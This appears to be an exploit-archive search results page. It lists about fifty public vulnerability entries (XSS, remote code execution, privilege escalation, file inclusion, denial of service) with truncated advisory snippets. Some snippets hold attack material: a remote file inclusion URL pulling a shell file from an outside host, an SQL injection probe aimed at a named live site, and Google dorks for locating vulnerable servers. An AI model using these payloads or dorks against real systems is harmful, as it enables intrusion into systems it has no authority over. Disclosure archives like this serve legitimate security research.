41207 matches found
Cisco Firepower Management Center 6.2.2.2 6.2.3 - Cross-Site Scripting
Cisco Firepower Management Center 6.2.2.2 6.2.3 - Cross-Site Scripting Exploit Title: Cisco Firepower Management Center Cross-Site Scripting XSS Vulnerability Google Dork: N/A Date: 23-01-2019 Exploit Author: Bhushan B. Patil Advisory URL:...
Apple iOSmacOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
Apple iOSmacOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem iohideventsystem is a MIG service which provides proxy access to various HID devices for untrusted clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is ...
ADB Broadband Gateways Routers - Privilege Escalation
ADB Broadband Gateways Routers - Privilege Escalation SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege escalation via linux group manipulation product: All ADB Broadband Gateways / Routers based on Epicentro...
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Google Dork: inurl:/Portal/Portal.mwsl Date: 2018-05-22 Exploit Author: t4rkd3vilz, Jameel Nabbo Vendor Homepage: https://www.siemens.com/ Version: SIMATIC S7-1500 CPU all...
RSA Authentication Manager 8.2.1.4.0-build1394922 8.3 P1 - XML External Entity Injection Cross-Site Flashing DOM Cross-Site Scripting
RSA Authentication Manager 8.2.1.4.0-build1394922 8.3 P1 - XML External Entity Injection Cross-Site Flashing DOM Cross-Site Scripting SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: XXE & XSS vulnerabilities product: R...
WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting
WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting Exploit Title: CalderaForms 1.5.9.1 - multiple XSS Date: 02-03-2018 Exploit Author: Federico Scalco fscalco at mentat dot is @mindpr00f Vendor Homepage: https://calderaforms.com/ Software Link:...
Primefaces 5.x - Remote Code Execution (Metasploit)
Primefaces 5.x - Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...
Oracle PeopleSoft 8.5x - Remote Code Execution
Oracle PeopleSoft 8.5x - Remote Code Execution Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 Date: 30 Oct 2017 Exploit Author: Vahagn Vardanyan Vendor Homepage: Oracle Software Link: Oracle PeopleSoft Version: 8.54, 8.55, 8.56 Tested on: Windows, Linux CVE :...
Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation
Realtek Audio Driver 6.0.1.7898 Windows 10 - Dolby Audio X2 Service Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075 Windows: Dolby Audio X2 Service Elevation of Privilege Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 on a Lenovo P50...
HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting Remote File Inclusion
HPE OpenCall Media Platform OCMP 4.3.2 - Cross-Site Scripting Remote File Inclusion Source: https://blogs.securiteam.com/index.php/archives/3087 SSD Advisory – HPE OpenCall Media Platform OCMP Multiple Vulnerabilities Want to get paid for a vulnerability similar to this one? Contact us at:...
Concrete5 CMS 8.1.0 - Host Header Injection
Concrete5 CMS 8.1.0 - Host Header Injection + Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.concrete5.org Product:...
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities
Trend Micro InterScan Web Security Virtual Appliance IWSVA 6.5 - Multiple Vulnerabilities Exploit Title: Trend Micro Interscan Web Security Virtual Appliance IWSVA 6.5.x Multiple Vulnerabilities Date: 28/11/2016 Exploit Author: SlidingWindow , Twitter: @KapilKhot Vendor Homepage:...
Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation
Apache Tomcat 876 Debian-Based Distros - Local Privilege Escalation ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - CVE-2016-1240 - Release date: 30.09.2016 - Revision: 1 - Severity: High...
Zen Cart 1.5.4 - Local File Inclusion
Zen Cart 1.5.4 - Local File Inclusion Advisory ID: HTB23282 Product: Zen Cart Vendor: Zen Ventures, LLC Vulnerable Versions: 1.5.4 Tested Version: 1.5.4 Advisory Publication: November 25, 2015 without technical details Vendor Notification: November 25, 2015 Vendor Patch: November 26, 2015 Public...
Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)
Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free MS15-124 small -ms-block-progression: lr; -ms-filter: "vv";...
ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting
ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting Title: =============== ManageEngine Asset Explorer v6.1 - XSS Vulnerability CVE-ID: ==================================== CVE-2015-2169 CVSS: ==================================== 3.5 Product & Service Introduction Taken from their...
ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities
ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 Discovered by Pedro Ribeiro [email protected], Agile Information Security...
Android WiFi-Direct - Denial of Service
Android WiFi-Direct - Denial of Service Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Android WiFi-Direct Denial of Service 1. Advisory Information Title: Android WiFi-Direct Denial of Service Advisory ID: CORE-2015-0002 Advisory URL:...
vldPersonals 2.7 - Multiple Vulnerabilities
vldPersonals 2.7 - Multiple Vulnerabilities Exploit Title: VLD Personal – Multiple Vulnerabilities Date: 09/11/2014 Exploit Author: Mr T Exploit Authors Website: http://www.securitypentester.ninja Vendor Homepage: http://www.vldpersonals.com/ Software Link:...
Mulitple WordPress Themes - admin-ajax.php?img Arbitrary File Download
Mulitple WordPress Themes - admin-ajax.php?img Arbitrary File Download WordPress CuckooTap Theme & eShop Arbitrary File Download Risk: High CWE number: CWE-200 Author: Hugo Santiago Contact: [email protected] Date: 31/08/2014 Vendor Homepage:...
Flussonic Media Server 4.1.25 4.3.3 - Arbitrary File Disclosure
Flussonic Media Server 4.1.25 4.3.3 - Arbitrary File Disclosure Document Title: ============ Flussonic Media Server 4.3.3 Multiple Vulnerabilities Release Date: =========== June 29, 2014 Product & Service Introduction: ======================== Flussonic is a mutli-protocol streaming server with...
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities --------------------------------------------------------------------------------- vtiger CRM debug"Entering customer portal function getlistvalues"; 2 The vulnerable code is located in the getprojectcomponents SOAP method defined in...
banana dance b.2.6 - Multiple Vulnerabilities
banana dance b.2.6 - Multiple Vulnerabilities Advisory ID: HTB23118 Product: Banana Dance Vendor: bananadance.org Vulnerable Versions: B.2.6 and probably prior Tested Version: B.2.6 Vendor Notification: October 3, 2012 Public Disclosure: December 19, 2012 Vulnerability Type: PHP File Inclusion...
GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation
GNU C Library 2.x libc6 - Dynamic Linker LDAUDIT Arbitrary DSO Load Privilege Escalation Source: http://marc.info/?l=full-disclosure&m=128776663124692&w=2 The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads...
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)
Microsoft Cinepak Codec CVDecompress - Heap Overflow MS10-055 ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | | | | | || / \ || | | | || ||// \/|/ http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/ ''' ''' Title :...
PHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution
PHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
DMXReady Faqs Manager 1.1 - Remote Contents Change
DMXReady Faqs Manager 1.1 - Remote Contents Change Title : DMXReady Faqs Manager http://target/path//applications/FaqsManager/incfaqsmanager.asp Edit - http://target/path//admin/FaqsManager/addcategory.asp : milw0rm.com 2009-01-14...
Joomla! Component com_colorlab 1.0 - Remote File Inclusion
Joomla! Component comcolorlab 1.0 - Remote File Inclusion -------------------- Joomla comcolorlab Remote File Include -------------------- Found : xoron -------------------- Download: http://download.joomlaportal.ch/content/view/474/ -------------------- Wrong Code: include...
Squirrelcart 1.x - cart.php Remote File Inclusion
Squirrelcart 1.x - cart.php Remote File Inclusion Title : Squirrelcart config.php, line 13 - $siteisproot = "blablabla"; Exploit : squirrelcart//popupwindow.php?siteisproot=http://example.com/shell.txt? notes : registerglobals = off is needed it seems. milw0rm.com 2007-08-19...
Cartweaver 2.16.11 - ProdID SQL Injection
Cartweaver 2.16.11 - ProdID SQL Injection author:meoconxatvnbrain.net product:CartWeaver main site:www.cartweaver.com 1.with CFM CartWeaver: sql injection in: Details.cfm?ProdID=a' demo: http://www.jbracing.co.uk/Details.cfm?ProdID=1' exploit: http://www.xxx.com/Details.cfm?ProdID=sql query link...
Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion
Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion VIRANGAR SECURITY TEAM Discovered By : A.nosrati www.virangar.org Public www.virangar.net Priv8 Mail: infoatvirangar.net Sabdrimer PRO v.2.2.4 Remote File Include Vulnerability Google Dork : "© Sabdrimer CMS" bug found in file : advanced1.php...
Apache 2.0.52 - GET Denial of Service
Apache 2.0.52 - GET Denial of Service !/usr/bin/perl Based on - apache-squ1rt.c exploit. Original credit goes to Chintan Trivedi on the FullDisclosure mailing list: http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html More info -...
JetBrains TeamCity 2018.2.4 - Remote Code Execution
JetBrains TeamCity 2018.2.4 - Remote Code Execution Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution Date: 2020-01-07 Exploit Author: Harrison Neal Vendor Homepage: https://www.jetbrains.com/ Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads...
Roxy Fileman 1.4.5 - Directory Traversal
Roxy Fileman 1.4.5 - Directory Traversal Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal Author: Patrik Lantz Date: 2019-12-06 Software: Roxy Fileman Version: 1.4.5 Vendor Homepage: http://www.roxyfileman.com/ Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net CVE:...
Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
Optergy 2.3.0a - Cross-Site Request Forgery Add Admin Title: Optergy 2.3.0a - Cross-Site Request Forgery Add Admin Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: history.pushState'', '', '/' input type="hidden"...
Adrenalin Core HCM 5.4.0 - ReportID Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - ReportID Reflected Cross-Site Scripting Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting Google Dork: NA Date: 2018-09-06 Exploit Author: Rishu Ranjan Vendor Homepage: https://www.myadrenalin.com/ Software Link:...
Optergy 2.3.0a - Username Disclosure
Optergy 2.3.0a - Username Disclosure Title: Optergy 2.3.0a - Username Disclosure Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: djuro teppi view alerton stef humba drmio de3 andri myko dzonka kosto beebee...
TortoiseSVN 1.12.1 - Remote Code Execution
TortoiseSVN 1.12.1 - Remote Code Execution Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2188 Product:...
Android 7 - 9 VideoPlayer - ihevcd_parse_pps Out-of-Bounds Write
Android 7 - 9 VideoPlayer - ihevcdparsepps Out-of-Bounds Write CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video with tiles enabled - pspps-i1tilesenabledflag you can...
Iperius Backup 6.1.0 - Privilege Escalation
Iperius Backup 6.1.0 - Privilege Escalation Exploit Author: bzyo Twitter: @bzyo Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation Date: 04-24-19 Vulnerable Software: Iperius Backup 6.1.0 Vendor Homepage: https://www.iperiusbackup.com/ Version: 6.1.0 Software Link:...
ASRock Drivers - Privilege Escalation
ASRock Drivers - Privilege Escalation SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASRock Drivers Elevation of Privilege Vulnerabilities 1. Advisory Information Title: ASRock Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2018-0005 Advisory URL:...
Bayanno Hospital Management System 4.0 - Cross-Site Scripting
Bayanno Hospital Management System 4.0 - Cross-Site Scripting Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting Date: 2018-09-05 Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621 Exploit Author: Gokhan Sagoglu Vendor Homepage::...
Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)
Drupal 7.58 - Drupalgeddon3 Authenticated Remote Code Execution PoC This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in...
WSO2 Carbon WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting
WSO2 Carbon WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Stored XSS Vulnerabilities product: WSO2 Carbon, WSO2 Dashboard Server vulnerable...
PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)
PRTG Network Monitor 18.1.39.1648 - Stack Overflow Denial of Service Exploit Title: PRTG 18.1.39.1648 - Stack Overflow Date: 2018-04-21 Exploit Author: Lucas "luriel" Carmo Vendor Homepage: https://www.paessler.com/prtg Software Link: https://www.paessler.com/download/prtg-download Version:...
Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow
Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE Date: 03-29-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage:...
Laravel Log Viewer 0.13.0 - Local File Download
Laravel Log Viewer 0.13.0 - Local File Download Exploit Title: Laravel log viewer by rap2hpoutre local file download LFD Date: 23/02/2018 Exploit Author: Haboob Team Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1 Version: v0.12.0 and below CVE : CVE-2018-8947 1...
HP iMC Plat 7.2 - Remote Code Execution (2)
HP iMC Plat 7.2 - Remote Code Execution 2 !/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE Date: 11-29-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
Trend Micro OfficeScan 11.0XG (12.0) - Memory Corruption
Trend Micro OfficeScan 11.0XG 12.0 - Memory Corruption + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt + ISR: ApparitionSec Vendor:...
Automated Logic WebCTRL 6.1 - Path Traversal Arbitrary File Write
Automated Logic WebCTRL 6.1 - Path Traversal Arbitrary File Write Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write Vendor: Automated Logic Corporation Product web page: http://www.automatedlogic.com Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior ALC WebCTRL, i-Vu 6.0 and...